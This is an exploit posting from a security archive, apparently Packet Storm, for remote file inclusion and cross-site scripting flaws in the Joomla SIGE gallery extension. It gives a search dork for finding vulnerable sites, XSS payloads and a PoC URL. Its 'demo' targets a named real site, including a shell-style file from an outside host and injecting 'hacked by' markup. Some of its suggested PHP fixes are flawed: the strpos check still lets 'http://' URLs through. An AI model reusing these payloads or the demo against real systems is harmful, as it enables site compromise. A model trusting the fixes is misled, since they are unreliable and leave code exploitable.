what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla SIGE 3.4.1-FREE / 3.5.3-PRO RFI / Cross Site Scripting

Joomla SIGE 3.4.1-FREE / 3.5.3-PRO RFI / Cross Site Scripting
Posted Nov 11, 2020
Authored by h4shur

Joomla Simple Image Gallery Extended (SIGE) extension versions 3.4.1-FREE and 3.5.3-PRO suffer from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
SHA-256 | 265f8f9a7f046f98dbd5f9fbc1abc8290c7b6b5ec21aafa90f84f680769abe58

Joomla SIGE 3.4.1-FREE / 3.5.3-PRO RFI / Cross Site Scripting

Change Mirror Download
# Title: SIGE - Simple Image Gallery Extended joomla extension 3.4.1-FREE /
3.5.3-PRO - Multi Vulnerability Remote File Inclusion [RFI] & Cross Site
Scripting [XSS]
# date: 2020-11-11
# Vendor Homepage: https://kubik-rubik.de/
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Software Link:
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended
# Software Link:
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/
# Version : 3.4.1-FREE / 3.5.3-PRO
# CWEs : CWE-98 / CWE-79
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"



### Note:

* Another web application bug is the RFI bug, which can be very dangerous
And stands for Remote File Inclusion, which directly executes loose scripts
on the server
Also, this security hole is created by programmer errors
And you must be fluent in programming language to secure and prevent this
bug
And you have to control the inputs of the application and use powerful
firewalls

* This bug is one of the most dangerous bugs and the access that the
intruder can gain using this bug is the implementation of Shell script
In fact, by running Shell script, it will have relatively complete access
to the Target site server
If we want to explain it in text, the hacker will execute the shell by
giving a link from Shell script in txt format to the input of the
vulnerable site.

* what's the solution ?
Check the file entered by the user from a list and enter it if the file was
in the list. Example :
<?php
$files=array('test.gif');
if(in_array($_GET['file'], $files)){
include ($_GET['file']);
}
?>
* If you are a server administrator, turn off allow_url_fopen from the file.

* Or do it with the ini_set command. Only for (RFI)
<?php
ini_set('allow_url_fopen ', 'Off');
?>

* We can use the strpos command to check that if the address is: // http,
the file will not be enclosed (it can only block RFI)
<?php
$strpos = strpos($_GET['url'],'http://');
if(!$strpos){
include($_GET['url']);
}
?>

* Using str_replace we can give the given address from two characters "/",
"." Let's clean up.
<?php
$url=$_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?>




### Xss Alert Code: "><svg onload=alert()>

'><script>alert('');</script>

<IMG "'"><script>alert()</script>'>

And Etc.




### Demo :

[+]
http://med.mui.ac.ir/oldsite/plugins/content/sige/plugin_sige/print.php?img=http://cheryco.ir/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E




### Poc :

[+] site.com/[folders]/print.php?img=[RFI] &name=[XSS] title=[XSS]




### Contact Me :

* Email : h4shursec@gmail.com
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @netedit0r
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close